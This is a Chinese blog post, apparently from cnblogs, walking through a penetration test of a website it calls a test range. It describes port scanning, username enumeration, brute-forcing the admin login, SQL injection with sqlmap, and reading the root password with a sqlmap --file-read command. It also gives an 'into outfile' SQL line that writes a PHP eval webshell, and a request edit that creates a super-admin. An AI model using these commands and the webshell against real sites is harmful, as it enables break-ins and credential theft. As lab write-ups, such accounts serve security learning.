• 【渗透过程】嘉缘网站 --测试


    声明:本片文章测试网站为测试靶场

    信息收集阶段:

    首先使用了一些常见的扫描工具:nmap  御剑

    使用nmap扫描端口 发现网站开放了 135 139 445 3306 等端口

    这里可以看到网站开放了一些危害较高端口:135 225等

    使用御剑扫描到一些敏感信息:phpinfo页面  后台登录地址

    可以从info页面直接看到网站的配置信息:网站绝对路径

    当访问IP+80端口发现有探针,可从中看出网站的中间件等信息

    (这里的phpmyadmin管理无法打开)

    测试阶段:

    信息收集完成后开始进一步测试

    针对网站进行手工测试

    在用户登录处发现,该网站没有对登录进行严格限制,而且可以通过返回错误信息发现网站存在哪些用户

    根据返回信息可以发现网站有admin用户,尝试使用暴力破解

    使用工具:BurpSuite

    对用户名为admin的用户进行暴力破解 密码为弱口令 ,可以登录用户

    继续测试发现网站存在SQL注入

    尝试使用工具进行注入检测

    使用工具:sqlmap

    经过注入发现网站后台的用户名及密码 ,phpmyadmin的用户及密码

    密码为密文,尝试解密发现只有data 和kefu用户可以解开

    在注入时发现我们的权限可以进行读文件但是不可写,尝试通过读取配置文件获取root密码

    读取文件需要网站绝对路劲,这是我们可以访问之前的info页面,获取绝对路径

    尝试使用sqlmap进行读取文件 ,成功读取到root密码 (但是没有发现phpmyadmin的页面)

    sqlmap -u "注入点的URL"  --file-read =“网站绝对路径/读取的文件“

    在前端无法和会员登录后无法找到漏洞,尝试登陆后台继续测试

    在使用data用户登录后发现为普通权限

    在后台对每项功能进行测试发现有一个执行sql语句的模块

    尝试使用sql语句进行写入一句话,发现写入成功

    select "<?php eval($_POST[apple]);?>" into outfile "网站绝对路径/1.php"  //1.php 为写入一句话木马的文件名

    在发现自己权限普通权限,尝试通过抓包获取包信息,发现存在越权漏洞(垂直)

    使用工具:burp

    通过burp抓取添加管理员的包,修改fr_admin_type=manage  发现成功添加超级管理员

     

    使用菜刀(蚁剑)连接写入的一句话

    下篇

    【提权过程】嘉缘网站--代理,提权 https://www.cnblogs.com/G-Shadow/p/10965035.html

  • 相关阅读:
    [leetcode-671-Second Minimum Node In a Binary Tree]
    [leetcode-667-Beautiful Arrangement II]
    棋盘从左上到右下最小初始值
    [leetcode-666-Path Sum IV]
    [leetcode-665-Non-decreasing Array]
    [leetcode-215-Kth Largest Element in an Array]
    LINQ简记(3):子句
    技巧篇:如何重写基类的事件
    技巧篇:结合反射技术实现多算法动态加密
    龙年新作:水印文字添加工具源码摘要
  • 原文地址:https://www.cnblogs.com/G-Shadow/p/10964374.html
Copyright © 2020-2023  润新知